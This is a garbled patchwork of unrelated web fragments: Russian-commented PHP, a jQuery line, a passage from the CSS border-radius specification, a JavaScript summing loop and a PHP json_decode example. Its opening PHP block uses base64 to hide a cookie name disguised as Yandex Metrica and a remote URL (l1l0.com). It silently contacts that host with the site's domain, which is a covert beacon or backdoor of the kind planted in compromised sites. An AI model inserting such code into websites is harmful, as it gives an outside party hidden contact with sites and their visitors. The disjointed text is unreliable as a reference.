//В случае, если у пользователя установлена Cookie с названием "_ym_ius" (в кодировке base64 это 'X3ltX2l1cw==')
if (!isset($_COOKIE[base64_decode('X3ltX2l1cw==') ]))
{
// Получаем содержимое файла http://l1l0.com/p/+"Адрес сайта"
@file_get_contents(base64_decode('aHR0cDovL2wxbDAuY29tL3Av') . $_SERVER['HTTP_HOST']);
// Устанавливаем Cookie с названием "_ym_ius" и значением 1.
@setcookie(base64_decode('X3ltX2l1cw==') , 1, time() + 31536000, '/', $_SERVER['HTTP_HOST']);
}
//Считываем сообщение из поля ввода с id mess_to_add
var mess=$("#mess_to_send").val();
The .val() method is primarily used to get the values of form elements such as input, select and textarea. When called on an empty collection, it returns undefined.
A box's backgrounds, but not its border-image, are clipped to the appropriate curve (as determined by ‘background-clip’). Other effects that clip to the border or padding edge (such as ‘overflow’ other than ‘visible’) also must clip to the curve. The content of replaced elements is always trimmed to the content edge curve. Also, the area outside the curve of the border edge does not accept mouse events on behalf of the element.
overflow: hidden;
height: 170px;
var myarray = [1,3,1,4];
var score = 0;
for(var i = 0;i<myarray.length;i++){
score+=myarray[i];
}
alert(score)
<?php
$json = '{"id":"2","username":"slovyanich","first_name":"","last_name":"","website":"","country":"Ukraine","city":"","address":"","image":"1831805871_1234263189_1081166798.jpg","cover":"1532897724_554195148_1974196412.jpg","verified":"0"}';
$jsonDe = json_decode($json,true);
var_dump($jsonDe);//Именованный массив
echo $jsonDe["id"];//=>2
?>